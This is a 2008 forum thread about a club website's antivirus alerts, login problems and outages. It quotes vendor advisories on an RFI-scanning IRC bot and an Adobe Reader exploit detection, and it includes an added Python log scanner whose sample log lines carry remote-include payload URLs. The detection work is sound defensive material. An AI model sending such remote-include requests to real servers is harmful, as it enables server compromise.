Re: Trouble with this site??????????

Posted: Mon Nov 10, 2008 10:03 pm
by mrevilracing
Found this tidbit of info while updating my ZoneAlarm firewall:

Virus Name: HackTool.Perl.IrBot.d
Date Detected: 09 Nov 2007 22:25:00 +0300
Date Published: 04 Aug 2008 13:22:00 +0300
Date Modified: 04 Aug 2008 13:26:06 +0300


Technical details:
This malicious program is a hacking utility. It is a Perl script. The size of infected files may vary from 12KB to 69KB.



Payload:
This script is an IRC bot which is used to search for Remote File Inclusion (RFI) vulnerabilities.

Depending on the commands received, the bot can:

wipe log files
search for sites with RFI vulnerabilities. In order to find a site, the bot is given a keyword. It then uses the keyword with the following search services:
http://www.google.nl
http://busca.uol.com.br
http://www.alltheweb.com
http://it.ask.com
http://search.aol.com
http://suche.fireball.de
http://search.lycos.com
http://arianna.libero.it
http://search.yahoo.com
http://search.live.com
If sites are found which contain the substrings "buterfly" and "uid=" in the address, the malicious program creates a request which redirects the address to the following link:

http://linknet*****.com/source/cmd.txt?
The contents of this file will then be run on the site's web server. This provides the remote malicious user with access to the server.

The script also contains the following string:

Yogya Ceria Scaner Bot Created By eviL-Zone -= evil =-


Removal instructions:
If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:

Delete the original malicious program file (the location will depend on how the program originally penetrated the victim machine).
Update your antivirus databases and perform a full scan of the computer (download a trial version of Kaspersky Anti-Virus).
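
Added example, not part of the original post or the quoted advisory: a site operator can look for the request shape described above (a query parameter such as "uid=" whose value is a remote URL, often ending in "?") in the web server's access log. The log lines, hosts and paths below are constructed samples, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request part of a combined-format access log entry (format assumed).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute URL is the RFI signature.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_probes(lines):
    """Return one dict per query parameter that carries a remote URL."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = value.strip()
            if REMOTE_URL_RE.match(value):
                hits.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "remote": value,
                    # A trailing "?" makes any suffix the vulnerable script
                    # appends part of the remote URL's query string.
                    "suffix_trick": value.endswith("?"),
                })
    return hits

# Constructed sample entries (documentation IPs, .example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2008:22:03:00 -0500] "GET /index.php?uid=http://files.example/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [10/Nov/2008:22:04:10 -0500] "GET /view.php?uid=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Nov/2008:22:05:30 -0500] "GET /page.php?inc=http%3A%2F%2Ffiles.example%2Fcmd.txt%3F HTTP/1.1" 404 300 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [10/Nov/2008:22:06:00 -0500] "GET /redirect.php?next=/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG):
        print(hit)
```

Parameters that legitimately carry URLs (redirect or link-preview features) will also match, so treat hits as leads to review against the scripts that actually include files.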

Re: Trouble with this site??????????

Posted: Tue Nov 11, 2008 12:32 am
by Joe Foering
I have not seen the adobe problem today BUT, when I come on the website I continue to get a message that Norton has protected me from "Bloodhound.Exploit.196" whatever that is. I am not a computer wiz, but it looks like this site is infected.

Re: Trouble with this site??????????

Posted: Wed Nov 12, 2008 10:33 am
by jerdeitzel
I was getting the same blocked virus as Joe. And now I can't log on at home. The same problem as a few months back, I keep getting booted back to the login page. It's working fine from the iPhone tho

Re: Trouble with this site??????????

Posted: Wed Nov 12, 2008 5:01 pm
by Mwilson
Paul Behofist had the exact same problem.

Re: Trouble with this site??????????

Posted: Wed Nov 12, 2008 6:48 pm
by mrevilracing
Discovered: August 6, 2008
Updated: August 7, 2008 4:31:05 AM
Type: Trojan, Virus
Infection Length: Varies
Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Windows 2000
CVE References: CVE-2007-5666, CVE-2008-0655, CVE-2008-0726, CVE-2008-2042, CVE-2007-5659, CVE-2007-5663, CVE-2008-0667

Bloodhound.Exploit.196 is a heuristic detection for files attempting to exploit the Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities (BID 27641).

Files that are detected as Bloodhound.Exploit.196 may be malicious.


Read more here: http://www.symantec.com/security_respon ... 99&tabid=2

Re: Trouble with this site??????????

Posted: Thu Nov 13, 2008 12:35 am
by Joe Foering
Matt Rowe, are you reading this? Any comment? Will this threat be eliminated?

Re: Trouble with this site??????????

Posted: Thu Nov 13, 2008 10:46 pm
by mrevilracing
I have gotten a comment about some folks unable to log on. Mark Aubel for sure. And there is a good possibility that Jeremy Dietzel too. Could someone check into that please?
Mark, if you're reading this, maybe make a new log in name and try that.

Re: Trouble with this site??????????

Posted: Thu Nov 13, 2008 11:17 pm
by jerdeitzel
Yes, there are issues with the site. Internet Explorer seems to be the issue. I'm signed on with Firefox and it seems to work fine.

Re: Trouble with this site??????????

Posted: Sat Nov 15, 2008 11:14 pm
by Mark Aubele
Jeremy,

Try deleting all cookies (it's in internet options), I was having the same problems, and this fixed it. Steve L. suggested I try it, and it works, thanks Steve!

Re: Trouble with this site??????????

Posted: Sun Nov 16, 2008 10:58 pm
by mrevilracing
NP Mark. Glad to help.

Re: Trouble with this site??????????

Posted: Tue Nov 18, 2008 8:48 am
by dspgti
In case you didn't notice, the site was down for maintenance on Saturday.

It worked. I'm flyin!

Dave Y

Re: Trouble with this site??????????

Posted: Thu Nov 20, 2008 8:16 pm
by mrevilracing
Matt,

I have noticed (maybe I'm just crazy) that after Saturday, I feel like the site is a little more responsive. Just wanted to post something positive since we typically only post when something is wrong. Thanks.

Re: Trouble with this site??????????

Posted: Fri Nov 21, 2008 7:56 pm
by dspgti
Matt,

I don't know if you will get time to read this before the PHA meeting, but I need to make a public apology for any comments or accusations that I have made that may have blamed you for difficulties that we have experienced with the web site. I am so illiterate when it comes to computers that I should not be insulting anyone for not making it stupid proof enough for someone like me to use.

One of the things I don't understand is who runs what? I thought we had an outside expert that took care of all this stuff. I didn't realize I was dumping on one of our own volunteers.

I want to say I am sorry for being crass, impatient, insulting and a general Ass Hole. Maybe everybody else knows my faults already but I'll only admit that to you. :oops:

Dave Y

Re: Trouble with this site??????????

Posted: Fri Nov 21, 2008 9:26 pm
by mrevilracing
Dave,

You don't want to know what happens and how it works. It's very complex and all ya need to know is every once in a while the website needs a tune up. Kind of like your pc, for instance. When was the last time you cleared all your temp files, cookies and history?? When was the last time you did a defrag? Updated your firewall or antivirus? It's a good idea to do those things, with the exception of the defrag. If you aren't deleting files all the time, you won't need it but once a month or once every 3 months.

Re: Trouble with this site??????????

Posted: Sun Nov 23, 2008 4:33 pm
by mrevilracing
Wow! Major hiccup in the site.

Matt. Can you PM me with some info regarding site administration please? I need to understand what gets done and who does it. Thanks

Re: Trouble with this site??????????

Posted: Mon Dec 01, 2008 9:00 pm
by mrevilracing
Site back up and running. Weeeeeeeeeee!!! Thanks to whoever fixed it. Anyone have a clue what was up???

Re: Trouble with this site??????????

Posted: Mon Dec 01, 2008 9:11 pm
by Matt Rowe
I was away for the holiday and came back to find some corrupted files. Sorry for the downtime while I was out of touch.

Re: Trouble with this site??????????

Posted: Mon Dec 01, 2008 10:10 pm
by Mwilson
Matt,
I find it hard to believe that you are ever out of touch. Rumor has it that Yeager was suffering from severe anxiety during the time this site was down and needed to have some oxygen treatments. The doctors said it was an extremely bad case of "FORUMITIS." :( Not to be confused with ROLLBARITIS and RECORDITIS. :wink:

Re: Trouble with this site??????????

Posted: Tue Dec 02, 2008 8:38 am
by dspgti
I'M OKAY. :shock: I told the doctors they could take off the straitjacket now that the forum is back up. Thank you all for the direct emails and phone calls making sure that I was okay during the outage. I kept myself busy by posting on other forums. By the way, the BMR site is working pretty good now. No traffic at this point but maybe it will grow.

WELCOME BACK!
Dave Y.

Re: Trouble with this site??????????

Posted: Tue Dec 02, 2008 9:03 am
by Ron Mann
Dave and I were going through withdrawal! Thanks Matt!